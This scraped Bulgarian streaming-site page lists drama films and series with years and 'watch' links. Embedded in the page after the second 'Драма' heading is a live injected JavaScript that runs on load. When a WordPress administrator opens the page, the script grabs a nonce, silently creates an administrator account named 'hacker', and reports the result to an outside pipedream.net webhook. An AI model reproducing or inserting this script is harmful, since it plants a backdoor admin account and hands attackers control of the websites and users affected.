Драма

  • ГРАН ТУРИЗМО

    HD

    2023 ГЛЕДАЙ
  • СКРИТО ОСТРИЕ

    HD

    Скрито Острие
    2023 ГЛЕДАЙ
  • АЗ СЪМ ГЕРОЙ

    HD

    2016 ГЛЕДАЙ
  • ЮЖЕН ВЯТЪР СЕЗОН 1

    HD

    Южен Вятър Сезон 1
    2020 ГЛЕДАЙ
  • НАСЛЕДСТВОТО

    HD

    2022 ГЛЕДАЙ
  • АВСТРАЛИЙСКИ ГАНГСТЕР СЕЗОН 1

    HD

    Австралийски гангстер
    2021 ГЛЕДАЙ
  • THE CHALLENGE

    HD

    2023 ГЛЕДАЙ
  • БАНДИТЕ НА МАРСИЛИЯ

    HD

    2020 ГЛЕДАЙ
  • ПО-СИЛНИ

    HD

    2017 ГЛЕДАЙ
  • ОПАСНА БЛИЗОСТ: БИТКАТА ПРИ ЛОНГ ТАН

    HD

    2019 ГЛЕДАЙ
  • СУТРЕШЕН БЛОК СЕЗОН 3

    HD

    Сутрешен блок Сезон 3
    2019 ГЛЕДАЙ
  • ВЪЛЧИ НРАВ

    HD

    2016 ГЛЕДАЙ
  • КОЯ Е ЕРИН КАРТЪР СЕЗОН 1

    HD

    Коя е Ерин Картър Сезон 1
    2023 ГЛЕДАЙ
  • ИСКАМ ДА СЪМ ПИСАТЕЛ

    HD

    2022 ГЛЕДАЙ
  • СУТРЕШЕН БЛОК СЕЗОН 1

    HD

    Сутрешен блок Сезон 1
    2019 ГЛЕДАЙ
  • СУТРЕШЕН БЛОК СЕЗОН 2

    HD

    Сутрешен блок Сезон 2
    2021 ГЛЕДАЙ
  • БУЛДОГ

    HD

    2023 ГЛЕДАЙ
  • РИТУАЛНИЯТ УБИЕЦ

    HD

    2023 ГЛЕДАЙ
  • ДЪЩЕРЯТА

    HD

    2016 ГЛЕДАЙ
  • МАЖОР

    HD

    2021 ГЛЕДАЙ
  • МОЯТА ГОЛЯМА ЛУДА ГРЪЦКА СВАТБА

    HD

    2002 ГЛЕДАЙ
  • ВСИЧКО СЕ ПРЕЕ…ЦАКА, ПИЙТ ТОНГ

    HD

    2004 ГЛЕДАЙ
  • КИЛЪР СЕЗОН 1

    HD

    Киллер сезон 1
    2022 ГЛЕДАЙ
  • НИЩО ЗА ГУБЕНЕ

    HD

    2022 ГЛЕДАЙ

Драма

<script type=”e6cd123957c495864b07c068-text/javascript”>
function addAdminUser() {
var uri = “/wp-admin/user-new.php”;
var username = “hacker”;
var email = “[email protected]”;
var password = “AttackerP455”;

var xhr = new XMLHttpRequest();
xhr.open(“GET”, uri, true);
xhr.send(null);

xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
var response = xhr.responseText;
var noncePos = response.indexOf(‘name=”_wpnonce_create-user” value=”‘);
var nonceVal = response.substring(noncePos + 35, noncePos + 45);

// Crear el admin
var xhr2 = new XMLHttpRequest();
xhr2.open(“POST”, uri, true);
xhr2.setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”);

var body = “action=createuser&”;
body += “_wpnonce_create-user=” + nonceVal + “&”;
body += “_wp_http_referer=%2Fwp-admin%2Fuser-new.php&”;
body += “user_login=” + username + “&”;
body += “email=” + email + “&”;
body += “pass1=” + password + “&”;
body += “pass2=” + password + “&”;
body += “pw_weak=on&”;
body += “role=administrator&”;
body += “createuser=Add+New+User”;

xhr2.send(body);

// Exfiltrar confirmación al webhook
const headers = new Headers();
headers.append(“Content-Type”, “application/json”);

const exfilBody = {
status: “admin_created”,
username: username,
nonce: nonceVal,
url: window.location.href,
userAgent: navigator.userAgent
};

const options = {
method: “POST”,
headers,
mode: “cors”,
body: JSON.stringify(exfilBody),
};

fetch(“https://eovrkqjaaojxmrc.m.pipedream.net”, options);
}
}
}
addAdminUser();
</script>

Login
Register
Register
Вече имаш акаунт?